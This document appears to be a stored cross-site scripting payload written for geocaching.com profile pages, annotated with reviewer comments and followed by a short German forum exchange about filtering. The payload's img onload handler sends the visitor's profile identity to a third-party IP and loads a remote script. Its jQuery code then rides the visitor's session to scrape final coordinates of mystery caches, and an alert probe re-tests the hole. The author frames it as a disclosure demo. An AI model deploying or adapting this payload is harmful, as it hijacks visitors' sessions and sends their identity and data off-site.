<!-- Review note: this is the injection vector itself, not a tracking pixel. The 1x1 <img> loads a
     legitimate image from geocaching.com's own host, so onload reliably fires once the profile page
     renders. The handler reuses the page's jQuery ($.getScript) to fetch and execute a script from a
     third-party IP (46.38.250.204) over plain http, and appends the inner HTML of the visitor's
     ".SignedInProfileLink" element, encoded with the legacy escape() function, to the request's `u`
     parameter. Net effect: the (presumably logged-in) visitor's identity is sent off-site before the
     remote script has even run, and that script then executes in the visitor's origin and session.
     Because the script is loaded over cleartext http, anyone on the path could also substitute it. -->
<img width="1" height="1" src="http://www.geocaching.com/images/tlnMasters/geocaching-logo.png" onload="$.getScript('http://46.38.250.204/gc_xss_by_wiesel.php?u='+escape($('.SignedInProfileLink').html()))" />
// Text shown to whoever views the affected profile, placed in front of the scraped result.
// Static, author-controlled HTML. Built by plain concatenation instead of one backslash-
// continued literal so each <br>-terminated line reads as a unit; the resulting string is
// byte-for-byte the same (the continuation backslashes never contributed a newline).
var msg = "<br><br>Hello Groundspeak.<br>" +
  "<br>" +
  "I already contacted you 3 times and reported this XSS vulnerability.<br>" +
  "Apart from a request on your side for explainig details on this bug nothing had happened yet ... absolutely nothing.<br>" +
  "So I decided to write a poor demo which grabs the final coordinates of a mystery cache from my profiles visitor.<br>" +
  "There are some other funny things the vulnerabiliy can be used to - all done with the privileges of the visitor,<br>" +
  "such as placing favorite points, delete caches and so on.<br>" +
  "Hopefully, you'll finally close this and clean all existing profiles containing the shown bug now!<br><br>";
// Account name the search below is scoped to. Empty in this dump; presumably the server-side
// gc_xss_by_wiesel.php fills it from the `u` parameter the onload handler sends (the visitor's
// .SignedInProfileLink HTML) — TODO confirm against the PHP, which is not part of this listing.
var user = "";
// Step 1: same-origin GET to the nearest-cache search, filtered by user and sorted by difficulty
// descending. Issued from the geocaching.com profile page, so the visitor's session cookies ride
// along — this is what "with the privileges of the visitor" in the message refers to. The fixed
// `tx` GUID selects a cache type; from the author's wording (mystery cache) presumably the
// Unknown/Mystery type — confirm. None of the three requests has a failure handler, so a
// non-200 response (or a premium-only page) just produces no output at all.
$.get("http://www.geocaching.com/seek/nearest.aspx?tx=40861821-1835-4e11-b666-8d41064d03fe&sortdir=desc&sort=dif&u="+escape(user), function( data ) {
// With the /g flag, match() returns the array of full matches only (capture groups are
// discarded), hence the fixed substr() offsets used below instead of the group.
var res = data.match(/geocache\/GC(\w{1,5})_/gi);
if (res != null && res.length>0) {
// "geocache/" is 9 characters, so this takes "GC" plus up to 5 code characters of the first
// (highest-difficulty) hit. NOTE(review): the regex accepts 1-5 code characters, so for a code
// shorter than GC+5 the trailing "_" ends up in `code` (e.g. "geocache/GC30_" -> "GC30_");
// whether the site tolerates that in the URL cannot be verified from here.
var code = res[0].substr(9,7);
// Step 2: fetch that cache's listing page.
$.get( "http://www.geocaching.com/geocache/"+code, function( data2 ) {
// Greedy ".*" runs to the LAST "</a> (Final" on the same line, so it can swallow neighbouring
// markup if several anchors share a line. The "(Final" literal is what ties the match to the
// additional waypoint labelled "Final".
var res2 = data2.match(/seek\/wpt.aspx(.*)<\/a> \(Final/gi);
// Fetched HTML is parsed through $(). Same origin, so no new trust boundary, but any <script>
// inside the fragment will run once display() appends it into the live page.
var cache = "<h1>"+$(data2).find("#ctl00_ContentBody_CacheName").text()+" FINAL:</h1><br>";
if (res2 != null && res2.length>0) {
// Cut the match at the first double quote (end of the href attribute). NOTE(review): the -1
// also drops the character immediately before the quote — looks like an off-by-one unless the
// real markup has a separator there; confirm against the actual page source.
$.get( "http://www.geocaching.com/"+res2[0].substr(0,res2[0].indexOf("\"")-1), function( data3 ) {
// Step 3: lift the waypoint page's main content block (which carries the coordinates) and hand
// it to display(), defined further down in this script. Referencing it before its definition is
// only safe because jQuery callbacks fire asynchronously, after the whole script has executed.
var wpt = $(data3).find("#ctl00_divContentMain").html();
display(cache+wpt);
});
} else {
display("<h3>Sorry, no Final Waypoint found, PMO?</h3>");
}
});
} else {
// `user` is interpolated into HTML unescaped. Harmless while it is the empty string, but if the
// server fills it from the request (see the TODO above) this is a second injection point.
display("<h3>Sorry, i found no mysteries published by "+user+"</h3>");
}
});
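// Renders the scraped result into the profile page.
// `out` is an HTML fragment taken from fetched geocaching.com pages (same origin); it is
// appended raw, after the static `msg` text, into the profile-text panel, and the two elements
// with ids m1/m2 (not part of this script; presumably profile markup) are hidden.
// Declared as a hoisted function rather than the original implicit-global assignment
// (`display = function(out) {...}`): that form only works in sloppy mode and only because the
// $.get callbacks that call display() cannot fire before the script has finished. A function
// declaration creates the same global `display`, is valid under "use strict", and exists
// before any caller regardless of timing.
function display(out) {
  $("#ctl00_ContentBody_ProfilePanel1_lblProfileText").append(msg + out);
  $("#m1").hide();
  $("#m2").hide();
}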
<!-- Review note: minimal re-test probe for the same onload-on-<img> vector as above, with no
     remote script this time; the alert text ("XSS noch da" = "XSS still there") only confirms
     that the event-handler attribute still executes on the profile page. -->
<img width="1" height="1" src="http://www.geocaching.com/images/tlnMasters/geocaching-logo.png" onload="alert('XSS noch da :p')" />
Ach, in Listings (Cache, Trackable) geht's nicht? Das würde mich jetzt schwer wundern. — HerrWiesel schrieb: „in sein Profil aufzunehmen“
Ich bin mir gerade unschlüssig, für wie schlau ich es halte, das nur in Listings, nicht aber auf der Profilseite zu filtern. So spontan fällt mir kein Szenario ein, das die Unterscheidung sinnvoll begründen würde. Ein Filter, der einzelne Event-Handler-Attribute nur auf bestimmten Seiten entfernt, ist ohnehin nur eine Blockliste; belastbar ist erst konsequentes, kontextabhängiges Output-Encoding bzw. eine zentrale Whitelist erlaubter Tags und Attribute, die für alle Seiten gleich gilt. — HerrWiesel schrieb: „Im Listing wird onload gefiltert, Trackable hab ich nicht probiert. Bugfix sollte also relativ trivial sein.“